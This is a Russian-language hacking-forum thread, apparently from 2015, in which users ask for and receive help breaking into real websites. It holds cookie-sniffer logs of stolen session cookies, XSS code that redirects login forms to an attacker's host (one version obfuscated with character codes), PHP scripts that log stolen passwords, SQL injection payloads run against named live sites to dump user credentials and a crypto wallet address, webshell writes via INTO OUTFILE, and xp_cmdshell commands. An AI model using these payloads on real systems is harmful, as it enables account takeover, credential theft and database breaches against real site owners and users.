На сайте www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php) у меня вшит скрипт и с сайта www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php) мне отправляются чужие куки на мой снифер,и в log.txt у меня хранятся чужие куки вида

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

w2vL_cca8_lastvisit=1437004847;

w2vL_cca8_nofavfid=1;

PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3;

w2vL_cca8_ulastactivity=e5cfycfnuKcJ%2BGIxyWlITZuc 7NidwNkrv05%2F53l2Qado4EaUbTuI;

w2vL_cca8_lastcheckfeed=21728%7C1437560824;

w2vL_cca8_visitedfid=45D46D53D2;

w2vL_cca8_viewid=tid_6189;

w2vL_cca8_forum_lastvisit=D_2_1437336598D_53_14375 24926D_46_1437525191D_45_1437561663; ==>Это чужие Cookie

w2vL_cca8_smile=1D1;

__zlcmid=Vienkp6pQjrijA;

_ga=GA1.2.956537111.1436906922F;

w2vL_cca8_lastact=1437566946%09forum.php%09;

w2vL_cca8_onlineusernum=59;

w2vL_cca8_sid=ro6N6g

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Мне достаточно в куках подменить 2 строчки для того что бы играть за чужого перса (для подмены куков использую расширение для оперы EditThisCookie) на www.site.ru (http://www.site.ru/forum/forum.php)

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

1)PHPSESSID=pe5k27v4h6ar1vsn1rc05lamr3

2)_ga=GA1.2.956537111.1436906922F

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

А на форуме (www.site.ru/forum/forum.php (http://www.site.ru/forum/forum.php)) у меня не получается подменить куки,даже если я меняю все строчки.

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Для проверки я зашел на форум под своим логином и при помощи расширения EditThisCookie посмотрел как выглядят свои куки,и там были еще строчки котрые снифер не ловит

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------

w2vL_cca8_auth

w2vL_cca8_saltkey

nik1201
22.07.2015, 22:13
Все я понял,для авторизации на форуме нужны 2 строчки вот эти

w2vL_cca8_auth

w2vL_cca8_saltkey

но почему то снифер их не ловит,в чем может быть проблема?

faza02
22.07.2015, 23:53
посмотрите какие флаги установлены для этих кук

ocheretko
23.07.2015, 00:51
yarbabin выкладывал ссылку, https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents

nik1201
23.07.2015, 08:46
yarbabin said:
↑ (https://antichat.live/posts/3871611/)
посмотрите какие флаги установлены для этих кук


На куках w2vL_cca8_auth установлено "session" и "httpOnly" а на w2vL_cca8_saltkey "httpOnly"

faza02
23.07.2015, 14:02
nik1201 said:
↑ (https://antichat.live/posts/3871692/)
На куках w2vL_cca8_auth установлено "session" и "httpOnly" а на w2vL_cca8_saltkey "httpOnly"


для JS они недоступны, только для сервера. в этом все и дело. придумывайте другой вектор атаки

nik1201
23.07.2015, 14:13
А обойти можно httponly?

faza02
23.07.2015, 14:36
nik1201 said:
↑ (https://antichat.live/posts/3871798/)
А обойти можно httponly?


на некоторых версиях apache можно: http://www.securityfocus.com/bid/51706/exploit

nik1201
23.07.2015, 14:45
Почему вчера я мог заменить куки а сегодня почему то не получается?

BigBear
23.07.2015, 15:00
nik1201 said:
↑ (https://antichat.live/posts/3871798/)
А обойти можно httponly?


Есть такая узявимость как HTTP Only Cookie Disclosure. Я её ещё называю Cookie Bomb.

Работает так:

1) Необходимо установить специальную cookie, название которой располагается ниже cookie, которую необходимо скомпрометировать, при условии упорядочивания их в алфавитном порядке.

2) Специальная cookie должна состоять из более чем 10000 символов для вызова уязвимости в версии Apache

frank
23.07.2015, 15:01
yarbabin said:
↑ (https://antichat.live/posts/3871807/)
на некоторых версиях apache можно:
http://www.securityfocus.com/bid/51706/exploit


А Ajax и метод XMLHTTPResponse не работают?

faza02
23.07.2015, 15:07
frank said:
↑ (https://antichat.live/posts/3871818/)
А Ajax и метод XMLHTTPResponse не работают?


почему бы им не работать?

frank
23.07.2015, 15:08
yarbabin said:
↑ (https://antichat.live/posts/3871820/)
почему бы им не работать?


Это бы как бы вопрос-уточнение . Спасибо.

madam
25.07.2015, 15:41
делаю такой запрос (SELECT 1 and ROW(1,1)>(select count(*),concat((SELECT wallet_address FROM users WHERE user_id = 1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'

но в ответ получаю

Subquery returns more than 1 row

как вытащить wallet_address (34 символа)?

спасибо

faza02
25.07.2015, 16:08
madam said:
↑ (https://antichat.live/posts/3872592/)
делаю такой запрос (SELECT 1 and ROW(1,1)>(select count(*),concat((SELECT wallet_address FROM users WHERE user_id = 1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
но в ответ получаю
Subquery returns more than 1 row
как вытащить wallet_address (34 символа)?
спасибо


выводите через extractvalue() или попробуйте обернуть колонку в group_concat()

madam
25.07.2015, 16:27
спасибо group_concat() помогло

nik1201
26.07.2015, 16:20
Есть сайт такого типаhttp://s1.sendimage.me/jHsTLwmb.jpeg

Форма логина такая -

----------------------------------------------------------------------------------------------------------------

Форма пароля такая -

----------------------------------------------------------------------------------------------------------------

Можно ли удаленным js воровать логи и пароли из этих форм ?кража кук не подходит т.к httponly не обходится.((Или что еще можно придумать?Заранее спс

Картинка была нарисована в paint ,просто порисовать захотелось)))

ocheretko
26.07.2015, 19:04
Можно, применяйте фишинг и социальную инженерию. Не обязательно использовать javascript, достаточно html разметки

nik1201
26.07.2015, 19:41
ocheretko said:
↑ (https://antichat.live/posts/3872917/)
Можно, применяйте фишинг и социальную инженерию. Не обязательно использовать javascript, достаточно html разметки


А не подскажете хороший бесплатный хостинг с поддержкой php и доменом .ru?

nik1201
26.07.2015, 21:17
Хотя поди палевно будет т.к будет ругаться антивирусник.А можно ли при помощи js красть введенные данные из форм?

madam
27.07.2015, 04:23
подскажите,возможно ли обойти ограничение в 40 символов,в поле восстановления пароля? Правка Html ничего не даёт(хотя раньше пролазило(()

frank
27.07.2015, 10:09
руками запрос формировать пробовали для отправки?

просто длинная поля еще может контролироваться со стороны сервера и тогда скорее всего никак нельзя.

madam
27.07.2015, 12:09
frank said:
↑ (https://antichat.live/posts/3873125/)
руками запрос формировать пробовали для отправки?
просто длинная поля еще может контролироваться со стороны сервера и тогда скорее всего никак нельзя.


только ручками и пробовала,скорее всего подправили файлик,всё таки облачный майнинг))

ocheretko
27.07.2015, 12:11
"]http://google.com>[/URL] - эта конструкция ровно 40 символов

madam
27.07.2015, 12:27
ocheretko said:
↑ (https://antichat.live/posts/3873167/)
"]http://google.com>[/URL]
- эта конструкция ровно 40 символов


там SQl inj

Br@!ns
27.07.2015, 12:44
madam said:
↑ (https://antichat.live/posts/3873164/)
только ручками и пробовала,скорее всего подправили файлик,всё таки облачный майнинг))


POST запрос отправляемый имеете ввиду пробовали подправлять?

madam
27.07.2015, 12:52
Br@!ns said:
↑ (https://antichat.live/posts/3873179/)
POST запрос отправляемый имеете ввиду пробовали подправлять?


Да

Br@!ns
27.07.2015, 13:15
madam said:
↑ (https://antichat.live/posts/3873188/)
Да


Тогда точно на стороне сервера фильтр, больше и не отправите

nik1201
27.07.2015, 19:50
Дальнейшая задача скрипта расположенного на удаленном сервере, заключается в приеме, обработке и сохранении POST параметров login и password. Некоторые ключевые фрагменты скрипта будут иметь следующий вид:

$fd = fopen($file,"a");

fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);

fclose($fd);

echo
"
document.location.replace('
http://www.site.com/auth.html’); (http://www.site.com/auth.html%E2%80%99))
"


----------------------------------------------------------------------------------------------------------------------

как именно нужно прописать этот php?

примерно так?)))

sysjuk
28.07.2015, 10:45
"site.ru/asdasd.php?id=-123'"

CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4

Как правильно раскрутить ее.

BigBear
28.07.2015, 12:00
sysjuk said:
↑ (https://antichat.live/posts/3873554/)
"site.ru/asdasd.php?id=-123'"
CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND d.is_deleted=0 AND a.is_deleted=0 AND a.is_approved=1 GROUP by d.id' at line 4
Как правильно раскрутить ее.


-123+order+by+100+--+

-123+union+select+1,2,3,4,5,6+--+

Всё по стандарту. Никаких аномалий.

sysjuk
28.07.2015, 12:59
BigBear said:
↑ (https://antichat.live/posts/3873572/)
-123+order+by+100+--+
-123+union+select+1,2,3,4,5,6+--+
Всё по стандарту. Никаких аномалий.


Так дело в том что ничего не меняется))) Уже все перепробовал)

YaBtr
28.07.2015, 13:17
sysjuk said:
↑ (https://antichat.live/posts/3873588/)
Так дело в том что ничего не меняется))) Уже все перепробовал)


Вы либо ссылку кидайте, либо разбирайтесь дальше сами. Флуд здесь не нужен.

SaNDER
28.07.2015, 19:05
http://www.toramp.com/schedule.php?id=505' (http://www.toramp.com/schedule.php?id=505%27) - появляются караракули .

И ничего более .

Единственное что узнал .

Host IP: 109.120.169.82

Web Server: nginx/0.7.67

Powered-by: PHP/5.3.3-7+squeeze14

ocheretko
28.07.2015, 19:13
Эти каракули написаны в кодировке - ISO-8859-5, и расшифровываются как Неверный формат запроса. Проверьте URL.

Простыми словами - Вы получаете сообщение от обработчика ошибок

SaNDER
29.07.2015, 08:35
ocheretko said:
↑ (https://antichat.live/posts/3873736/)
Эти каракули написаны в кодировке -
ISO-8859-5
, и расшифровываются как
Неверный формат запроса. Проверьте URL.
Простыми словами - Вы получаете сообщение от обработчика ошибок


Благодарю,и это не как,не относится к SQL?Взломать нельзя? . Наверно сайт защищен от SQL .

Genius Black
29.07.2015, 16:53
Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 41

Warning: mysql_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 42

Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in C:\wamp\www\productos.php on line 43

Query invбlido: select explica from linea_explica where linea = ''''

С этим ничего как я понял нельзя сделать?

faza02
29.07.2015, 18:32
зависит от того, что вы хотите сделать.

Genius Black
29.07.2015, 18:33
yarbabin said:
↑ (https://antichat.live/posts/3874160/)
зависит от того, что вы хотите сделать.


Залезть в базу и слить данные.

Все способы, которые можно было - я перепробовал.

Br@!ns
30.07.2015, 11:05
Genius Black said:
↑ (https://antichat.live/posts/3874161/)
Залезть в базу и слить данные.
Все способы, которые можно было - я перепробовал.


Вы что то с запросом сделать пытаетесь или это у вас просто страничка с ошибкой? ссылочку бы показали

XAMEHA
30.07.2015, 12:10
linea='


Genius Black said:
↑ (https://antichat.live/posts/3874115/)
Query invбlido: select explica from linea_explica where linea = '
''
'


linea=\' UNION SELECT version(); #


Genius Black said:
↑ (https://antichat.live/posts/3874115/)
Query invбlido: select explica from linea_explica where linea = '
\'' UNION SELECT version(); #
'


Может быть.

sysjuk
30.07.2015, 12:46
YaBtr said:
↑ (https://antichat.live/posts/3873592/)
Вы либо ссылку кидайте, либо разбирайтесь дальше сами. Флуд здесь не нужен.




Code:
клад3.биз/?district_id=-31 раскрутить поможешь?

ссылка ушла в личку.

SaNDER
30.07.2015, 15:47
Havj не инжектить . Пробовал раскручивать,выдаёт ту же самую ссылку .

Вот собственно сама ссылочка metravib.acoemgroup.com/application.php?id=3&idm=20&ida=34 1

Blind Injection .

MYSQL Injection . Ссылка : www.muziekcentrum.be/carrier.php?id=8333 (http://www.muziekcentrum.be/carrier.php?id=8333) .

Как это раскрутить ? Помогите .

error'овые,не?

nik1201
30.07.2015, 20:34
Помогите пжл,как сохранять запрос


Code:
$fd = fopen($file,"a");

fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);

fclose($fd);

faza02
30.07.2015, 20:41
nik1201 said:
↑ (https://antichat.live/posts/3874648/)
Помогите пжл,как сохранять запрос

Code:
$fd = fopen($file,"a");

fputs($fd, " login: ".$_POST['login']." password:".$_POST['password']);

fclose($fd);




код верный, что у вас не выходит?

nik1201
30.07.2015, 20:47
А куда он должен сохранять логин и пасс?

Ch3ck
30.07.2015, 21:25
В $file, имя которого ты указываешь сам.

Pro100Nyan
31.07.2015, 14:19
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini

Br@!ns
31.07.2015, 15:35
Pro100Nyan said:
↑ (https://antichat.live/posts/3874867/)
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini


Reverse IP не помогает?

faza02
31.07.2015, 15:49
итак, ищем в гугле "IIRF.ini"

в первых 6 результатах видим:


Installation of URL Rewriting module (IIRF) for IIS6/IIS7


вывод - IIS. ищем "iis configuration file"

находим: http://stackoverflow.com/questions/8635884/iis7-settings-file-locations

Pro100Nyan
31.07.2015, 16:29
yarbabin said:
↑ (https://antichat.live/posts/3874903/)
итак, ищем в гугле "IIRF.ini"
в первых 6 результатах видим:
вывод - IIS. ищем "iis configuration file"
находим:
http://stackoverflow.com/questions/8635884/iis7-settings-file-locations


К сожалению там нету такого файла, там одни только .dll файлы

vikler
31.07.2015, 16:30
Кто-нибудь может в личке помочь и глянуть один сайт? DB Oracle язвимость

Place: GET

Parameter: SL

Type: boolean-based blind

Title: Oracle boolean-based blind - GROUP BY and ORDER BY clauses

Payload: ...&SL=54,(SELECT (CASE WHEN (7590=7590) THEN 54 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Type: AND/OR time-based blind

Title: Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)

Payload: ....&SL=54,(SELECT (CASE WHEN (9646=9646) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(101)||CHR(9 7)||CHR(117),5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)

Всё выдётся отлично, вывод хороший, стабильный. Но вместо хеша или пароля в табличке юзоров выдаётся какая-то символьная фигня типа:

\x1c\x1f\x17\x18\x0ev\x1fjt\x15}

Притом это не на одном сайте, а на всех сайтах этой платформы.

Кто имеет время глянуть, напишите в личку, я скину урл. Очень важные для меня сайты на этой полатформе, я бьюсь в отчаянии, не знаю что делать. ПОМОГИТЕ!!!!!!

UPDATE: прогнала SQLMAP с режимом --binary-fields=PASSWORD, похоже, что пароли хранятся в бинарном виде. Выдаёт следующее:

157E02680F7F

1B0C130E197B620B7316

131E091001

171E0A0B057F620C7E12

00051D00087D6B087F17

171D1C0D0B676A08711D

0A00011F0A076F0F07600B0A

Что это за хеши такие? Oracle(DES)? или...? есть идеи?

PS можно платно

djon
03.08.2015, 12:02
Почему у меня ничего не записывает php?

------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------

Вставляю этот скрипт

------------------------------------------------------------------------------------------------------------

document.lsform.action=‘http://hosting.ru/base.php’

------------------------------------------------------------------------------------------------------------

в страницу где форма

------------------------------------------------------------------------------------------------------------



------------------------------------------------------------------------------------------------------------

И ничего не происходит,в чем может быть проблема?

ocheretko
03.08.2015, 14:32
djon said:
↑ (https://antichat.live/posts/3875805/)
Почему у меня ничего не записывает php?
------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------
Вставляю этот скрипт
------------------------------------------------------------------------------------------------------------
document.lsform.action=‘
http://hosting.ru/base.php’
------------------------------------------------------------------------------------------------------------
в страницу где форма
------------------------------------------------------------------------------------------------------------

------------------------------------------------------------------------------------------------------------
И ничего не происходит,в чем может быть проблема?




Code:
$url = "";
$ls_username = $_POST['ls_username'];
$ls_password = $_POST['ls_password'];

if ($ls_username != null){
if ($ls_password != null) {
$open=fopen('base.txt',"a");
fwrite($open,"$ls_username;$ls_password\n");
fclose($open);
}
}

Genius Black
03.08.2015, 15:52
Почему информация об ошибке выводиться только при .php?c=1 group by . Если указывать ' , union , by order или любые другие способы, то ничего не выводит?

XAMEHA
04.08.2015, 00:44
man474019 said:
↑ (https://antichat.live/posts/3875808/)
плиз, помогите с sqli


Нет инъекции. Только ошибка.

djon
04.08.2015, 08:44
Почему когда вставляю код (

document.getElementById('lsform').action="http://МойХостинг1.ru/base.php? (http://МойХостинг1.ru/base.php)";)

на сайт где есть активная xss,то она преобразуется так (УязвимыйСайт.ru/base.php)и пишет что "страница не найдена" а на втором моем хостинге где расположена копия сайта (УязвимыйСайт.ru/forum.php) по адрессу (http://МойХостинг2.ru) то логины и пароли идут нормально после нажатия на кнопку Вход,и после нажатия она переадресовывается на ("http://МойХостинг1.ru/base.php? (http://МойХостинг1.ru/base.php)")Почему с (УязвимыйСайт.ru/forum.php) не идут пароли ?

ocheretko
04.08.2015, 12:56
Попробуйте так. Может там нормализатор ссылок обрезает http://


Code:
String.fromCharCode(100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 66, 121, 73, 100, 40, 39, 108, 115, 102, 111, 114, 109, 39, 41, 46, 97, 99, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 1052, 1086, 1081, 1061, 1086, 1089, 1090, 1080, 1085, 1075, 49, 46, 114, 117, 47, 98, 97, 115, 101, 46, 112, 104, 112, 63, 34, 59);

faza02
04.08.2015, 13:07
потому что так работает action. добавьте редирект обратно на форум в вашем base.php

djon
04.08.2015, 14:03
Редирект не помагает,вот как происходит;мой хостинг где лежит base.php "МойХостинг.ru/base.php" их сайт "УязвимыйСайт.ru/forum/forum.php" когда нажимаю ВХОД то ничего не происходит,даже в профиль не заходит,смотрю через чарльз что происходит там,и вижу что вместо "МойХостинг.ru/base.php" становится так" УязвимыйСайт.ru/base.php" и в пакете есть логин и пас,но ничего не происходит(((

вот сам base.php

----------------------------------------------------------------

-------------------------------------------------------------------

Я сначала ввожу скрипт вместо ника а в 1.js лежит document.getElementById('lsform').action="http://МойСайт.ru/base.php? (http://МойСайт.ru/base.php)";

--------------------------------------------------------------------

XAMEHA
05.08.2015, 12:07
Скрипт, скорее всего, нужно выполнять в document onload. Возможно на странице есть ещё какие-то скрипты.

Правильнее было бы сделать скрипт для события onsubmit, который без двойных заметных редиректов отправлял данные к нам на хост. Если XSS не в login.php, пишут скрипты, которые остаются на странице даже после того, как юзер её покинет переходом по ссылке на другую.

djon
05.08.2015, 13:49
Я для этой формы скрипт подключаю,есть еще js на их сайте,выглядит так

А в нем вот это


Code:
function lsSubmit(op) {
var op = !op ? 0 : op;
if(op) {
$('lsform').cookietime.value = 2592000;
}
if($('ls_username').value == '' || $('ls_password').value == '') {
showWindow('login', 'member.php?mod=logging&action=login' + (op ? '&cookietime=1' : ''));
} else {
ajaxpost('lsform', 'return_ls', 'return_ls');
}
return false;
}

function errorhandle_ls(str, param) {
if(!param['type']) {
showError(str);
}
}

Еще к сылке добавляется inajax, вот так /base.php?&inajax

И уязвимость Активная,и находится где форма авторизации

GusTor
05.08.2015, 20:48
Может кто подсказать что можно из этого вытащить?

вот сайт http://www.rostof.ru/article.php?chapter=&id=

а вот скрин скана

http://hkar.ru/CVkO

kingbeef
06.08.2015, 22:43
GusTor said:
↑ (https://antichat.live/posts/3876802/)
Может кто подсказать что можно из этого вытащить?
вот сайт
http://www.rostof.ru/article.php?chapter=&id=
а вот скрин скана
http://hkar.ru/CVkO


Ну там же написано.


Code:
http://www.rostof.ru/article.php?chapter=&id=">alert()

XAMEHA
07.08.2015, 00:00
djon said:
↑ (https://antichat.live/posts/3876635/)



Вот он - корень всех зол.

BabaDook
07.08.2015, 00:09
Здравствуйте. заранее простите за не корректную формулировку вопроса. Имею sql инъекцию, права рут, ОС виндус, как выполнить команду cmd?

winstrool
07.08.2015, 00:19
BabaDook said:
↑ (https://antichat.live/posts/3877302/)
Здравствуйте. заранее простите за не корректную формулировку вопроса. Имею sql инъекцию, права рут, ОС виндус, как выполнить команду cmd?


Заливаите шелл и если нужные функции в пхп не отключены то через консоль выполняите нужные вам команды

BabaDook
07.08.2015, 11:20
winstrool said:
↑ (https://antichat.live/posts/3877305/)
Заливаите шелл и если нужные функции в пхп не отключены то через консоль выполняите нужные вам команды


шел залить можно. Но мне интересно именно это. как через sqlmap делать я более мение знаю, а вот как ручками не знаю вообще. Надо привыкать в полевым условиям, когда только я и сайт, а между нами браузер.

grimnir
07.08.2015, 11:29
BabaDook said:
↑ (https://antichat.live/posts/3877382/)
шел залить можно. Но мне интересно именно это. как через sqlmap делать я более мение знаю, а вот как ручками не знаю вообще. Надо привыкать в полевым условиям, когда только я и сайт, а между нами браузер.


SELECT '' INTO OUTFILE 'var/www/site.com/shell.php';--

BabaDook
07.08.2015, 11:32
grimnir said:
↑ (https://antichat.live/posts/3877385/)
SELECT '' INTO OUTFILE 'var/www/site.com/shell.php';--


это запись. а мне именно выполнение cmd команды надо. Ладно , сделаю выложу то что мне надо было, не могу объяснить ))

djon
07.08.2015, 11:47
XAMEHA said:
↑ (https://antichat.live/posts/3877296/)
Вот он - корень всех зол.


Да мне кажется что проблема даже не в "onsubmit="return lsSubmit();"

Пробую сделать даже так для чекбокса,что бы удалить disabled="disabled




document.getElementById ('htmlon').removeAttribute ('disabled');

И тоже не выходит cсылка делается такой /forum/h%3C/a%3E%3C/li%3E%3Cli%20title=

Я вот что еще нашел на странице



8

-------------------------------------------------------------------

Крест

faza02
07.08.2015, 12:16
BabaDook said:
↑ (https://antichat.live/posts/3877386/)
это запись. а мне именно выполнение cmd команды надо. Ладно , сделаю выложу то что мне надо было, не могу объяснить ))


sqlmap так и делает. льет файл с system() или другими и к ним уже обращается, как к шеллу, парся вывод. в postgresql 9.3 и mssql есть функция выполнения системных команд. это то, о чем вы говорите? какая dbms? mssql?

XAMEHA
07.08.2015, 12:18
Выполнение команд (mysql) - либо через сторонний интерпретатор (php), либо через эксплоит, либо этим способом (для SQL-инъекций не подойдет): https://forum.antichat.net/threads/324318/

BabaDook
07.08.2015, 12:25
Вот, это я имел в виду.

http://www.sqlinjectionwiki.com/Cat...eat-sheet/#Enablingxp_cmdshellinSQLServer2005 (http://www.sqlinjectionwiki.com/Categories/1/mssql-sql-injection-cheat-sheet/#Enablingxp_cmdshellinSQLServer2005)


Code:
XEC master.dbo.xp_cmdshell "cmd.exe реж C: '

а про вот это я забыл, что такое тоже можно


Code:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
Exec xp_regread HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Параметры", "nullsessionshares"
Exec xp_regenumvalues HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ SNMP \ Параметры \ validcommunitie

faza02
07.08.2015, 12:40
т. е. нужно было просто с самого начала сказать, что у вас mssql.


BabaDook said:
↑ (https://antichat.live/posts/3877408/)
Вот, это я имел в виду.
http://www.sqlinjectionwiki.com/Cat...eat-sheet/#Enablingxp_cmdshellinSQLServer2005 (http://www.sqlinjectionwiki.com/Categories/1/mssql-sql-injection-cheat-sheet/#Enablingxp_cmdshellinSQLServer2005)

Code:
XEC master.dbo.xp_cmdshell "cmd.exe реж C: '

а про вот это я забыл, что такое тоже можно

Code:
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
Exec xp_regread HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Параметры", "nullsessionshares"
Exec xp_regenumvalues HKEY_LOCAL_MACHINE "SYSTEM \ CurrentControlSet \ Services \ SNMP \ Параметры \ validcommunitie



https://rdot.org/forum/showthread.php?t=826 читать абзац "выполнение команд"

psihoz26
07.08.2015, 22:32
nik1201 said:
↑ (https://antichat.live/posts/3872869/)
Есть сайт такого типа
http://s1.sendimage.me/jHsTLwmb.jpeg
Форма логина такая -
----------------------------------------------------------------------------------------------------------------
Форма пароля такая -
----------------------------------------------------------------------------------------------------------------
Можно ли удаленным js воровать логи и пароли из этих форм ?кража кук не подходит т.к httponly не обходится.
((Или что еще можно придумать?Заранее спс
Картинка была нарисована в paint ,просто порисовать захотелось)))




ocheretko said:
↑ (https://antichat.live/posts/3872917/)
Можно, применяйте фишинг и социальную инженерию. Не обязательно использовать javascript, достаточно html разметки


Незачем фишинг ,левые сервера и уж темболее си.Если сторед xss на тойже страничке что и форма авторизации то все легко перехватывается. Нужен будет сниффер лишь чтобы заместо куков ловить логины и пароли. По реализации подсказать в лс могу

djon
10.08.2015, 13:06
Нашел такое www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&pwd=123123&fn=1 (http://www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&pwd=123123&fn=1)

это отвечает за вход на сайт,когда нажимаю ENTER то оно выдает такое ({"email":"test@mail.ru (mailto:test@mail.ru)","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"}) в параметре cb= можно прописать любой html код,например () то он исполнится ,и будет выглядеть так

тут будет форма

({"email":"test@mail.ru (mailto:test@mail.ru)","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"})

И ява скрипты не исполняются почему то.

Что можно с этим сделать?

Pro100Nyan
10.08.2015, 13:51
Pro100Nyan said:
↑ (https://antichat.live/posts/3874867/)
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini


Актуально...

Chudak
10.08.2015, 15:17
Code:
ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version() ,1,1)))='53

version 5.1.72-cll-lve

Помогите. WAF фильтрует information_schema.tables. Как обойти?

Unknowhacker
10.08.2015, 17:33
Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?


Code:
http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+

faza02
10.08.2015, 17:44
Unknowhacker said:
↑ (https://antichat.live/posts/3878526/)
Когда пишет.. ORA-00923: FROM keyword not found where expected - это считается SQL-Уязвимостью ?

Code:
http://www.pz.gov.ua/prrasp/rasptrain.php?train=2345+order+by+5+--+



https://rdot.org/forum/showthread.php?t=156

XAMEHA
11.08.2015, 02:14
djon said:
↑ (https://antichat.live/posts/3878428/)
Нашел такое
www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&pwd=123123&fn=1 (http://www.site.ru/api.php?appId=APP324233456&cb=&user=test@mail.ru&pwd=123123&fn=1)
это отвечает за вход на сайт,когда нажимаю ENTER то оно выдает такое ({"email":"
test@mail.ru (mailto:test@mail.ru)
","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"}) в параметре cb= можно прописать любой html код,например () то он исполнится ,и будет выглядеть так
тут будет форма
({"email":"
test@mail.ru (mailto:test@mail.ru)
","nickname":"test","profileId":"6434","password":"7534534583eeffa8377c4d","freeze":"0","opo_userid":"133"})
И ява скрипты не исполняются почему то.
Что можно с этим сделать?


Скорее всего возвращаемый content-type - text/json, XSS там не выполнить. Я бы обратил внимание на возможные получения данных и CSRF.


Pro100Nyan said:
↑ (https://antichat.live/posts/3878443/)
Здравствуйте есть шелл на сервере Windows NT SERVER, нужно узнать какие домены на нем установлены, как можно это узнать ?)) Стоит наверно IIRF(хз что это но такие файлы есть в корне сайтов) вот такие файлы IIRF.ini


Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками?


Chudak said:
↑ (https://antichat.live/posts/3878472/)

Code:
ibizavipholiday.com/ru/villas?place=1'+||+ascii(lower(substring(version() ,1,1)))='53

version 5.1.72-cll-lve
Помогите. WAF фильтрует information_schema.tables. Как обойти?


Вы в слепую крутите? У вас вывод есть. Еще есть вывод ошибок. WAF фильтрует information_schema, в настоящее время обойти это не возможно. Брутите таблицы

Pro100Nyan
11.08.2015, 03:06
XAMEHA said:
↑ (https://antichat.live/posts/3878691/)
Домены, которые DNS, или домены, которые наборы сетевых компьютеров с общими политиками?


которые dns, те что сайты)

blackhead
11.08.2015, 17:39
Нашел вот такую уязвимость


Code:
http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9 +--


Нашел username,password но админку так и не смог найти((


Code:
http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FR OM+users+LIMIT+0,1+--


Записать файл не получается.

Что нибудь можно тут сделать? Помогите начинающему

OxoTnik
11.08.2015, 20:07
blackhead said:
↑ (https://antichat.live/posts/3878949/)
Нашел вот такую уязвимость

Code:
http://www.oscar-k.dk/newsdetail.php?id=2+union+select+1,2,3,4,5,6,7,8,9 +--

Нашел username,password но админку так и не смог найти((

Code:
http://www.oscar-k.dk/newsdetail.php?id=-2+union+select+1,id,username,password,5,6,7,8,9+FR OM+users+LIMIT+0,1+--

Записать файл не получается.
Что нибудь можно тут сделать? Помогите начинающему


http://www.oscar-k.dk/content/index.php?signIn=1

Muracha
11.08.2015, 20:47
В админке сайта есть скрипт elFinder.

Пытаюсь через него загрузить php файл.

Скрипт, походу, читает заголовки mime т.к.

Файлы типа .php и html не пропускает. Если создать простейший скрипт аля

не пропустит.

